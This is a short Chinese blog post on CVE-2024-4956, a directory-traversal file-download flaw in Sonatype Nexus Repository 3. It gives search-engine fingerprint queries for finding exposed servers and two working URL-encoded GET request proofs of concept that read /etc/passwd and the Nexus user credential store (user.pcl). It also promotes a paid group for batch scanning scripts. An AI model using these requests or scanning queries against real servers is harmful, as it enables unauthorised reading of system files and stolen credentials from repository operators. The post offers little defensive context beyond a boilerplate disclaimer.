Sonatype Nexus Repository 3目录穿越-文件下载漏洞-CVE-2024-4956

 0x01 免责声明
文章内容仅供日常学习使用,请勿非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。如有内容争议或侵权,我们会及时删除。

0x02 漏洞描述

Nexus是一个强大且使用广泛的Maven仓库管理器,它极大地简化了自己内部仓库的维护和外部仓库的访问,利用Nexus你可以只在一个地方就能够完全控制访问和部署在你所维护仓库中的每个Artifact。

Nexus Reposity3目录穿越-文件下载漏洞-CVE-2024-4956

影响版本:Nexus Repository 3 < 3.68.1

0x03 测绘查询-系统指纹

 fofa:app="Nexus-Repository-Manager"

鹰图:app.name=="Nexus Repository"

0x04 漏洞复现
1、访问漏洞系统


2、发送GET包,读取etc/password文件


3、读取密码文件

4、poc

GET /.%2f/..%2f/..%2f/..%2f/..%2f/etc/passwd HTTP/1.1Host:127.0.0.1

GET /.%2f/..%2f/..%2f/..%2f/..%2f/nexus-data/db/security/user.pcl HTTP/1.1Host:127.0.0.1

 0x05 Nuclei POC 批量验证脚本

加入帮会获取批量验证脚本,帮会每天更新漏洞nday、1day漏洞poc

点击链接加入帮会:加入帮会-发现更有料的网安圈基于安全从业者同行主题交流需求,为入驻者提供WIKI建设、安全经验输出、前沿技术及工具分享等模块,入驻即可共探安全思路。icon-default.png?t=N7T8https://wiki.freebuf.com/front/societyFront?invitation_code=2e2d0438&society_id=186&source_data=2

扫描也可加入:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值